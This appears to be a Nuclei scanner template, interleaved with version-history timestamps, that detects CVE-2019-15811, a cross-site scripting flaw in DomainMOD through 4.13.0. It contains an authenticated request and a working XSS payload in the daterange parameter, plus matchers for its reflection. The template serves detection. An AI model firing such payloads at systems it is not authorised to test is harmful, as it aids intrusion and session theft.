2022-07-16 07:01:56 +00:00
id : CVE-2019-15811
info :
2022-09-08 13:28:46 +00:00
name : DomainMOD <=4.13.0 - Cross-Site Scripting
2022-07-16 07:01:56 +00:00
author : arafatansari
severity : medium
description : |
2022-09-08 13:28:46 +00:00
DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability.
2022-07-16 07:01:56 +00:00
reference :
- https://www.exploit-db.com/exploits/47325
- https://github.com/domainmod/domainmod/issues/108
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-15811
2022-09-08 13:41:45 +00:00
- https://zerodays.lol/
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-07-16 07:01:56 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2019-15811
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00376
2024-01-29 17:11:14 +00:00
epss-percentile : 0.69988
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
2022-07-16 08:01:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:53:28 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : domainmod
product : domainmod
2022-08-27 04:41:18 +00:00
tags : cve,cve2019,domainmod,xss,authenticated,edb
2022-07-16 07:01:56 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-16 07:01:56 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
2022-07-16 08:03:08 +00:00
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
2022-07-16 07:01:56 +00:00
Host : {{Hostname}}
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-07-16 07:01:56 +00:00
max-redirects : 2
matchers :
2022-07-16 08:01:09 +00:00
- type : dsl
dsl :
- 'status_code_2 == 200'
2023-06-19 21:10:30 +00:00
- 'contains(header_2, "text/html")'
2022-07-16 08:03:08 +00:00
- 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
2022-07-18 07:27:56 +00:00
- 'contains(body_2, "DomainMOD")'
2022-07-16 08:01:09 +00:00
condition : and
2024-01-30 06:46:18 +00:00
# digest: 490a0046304402200d689850b4443613f5ab2b50407f8cfa78dab63de012bd61cc655742087e38b30220657b1f2d39d701d77dc80622ccd6e358e348544768d94d6c61b7bb6aa1b1a40e:922c64590222798bb761d5b6d8e72950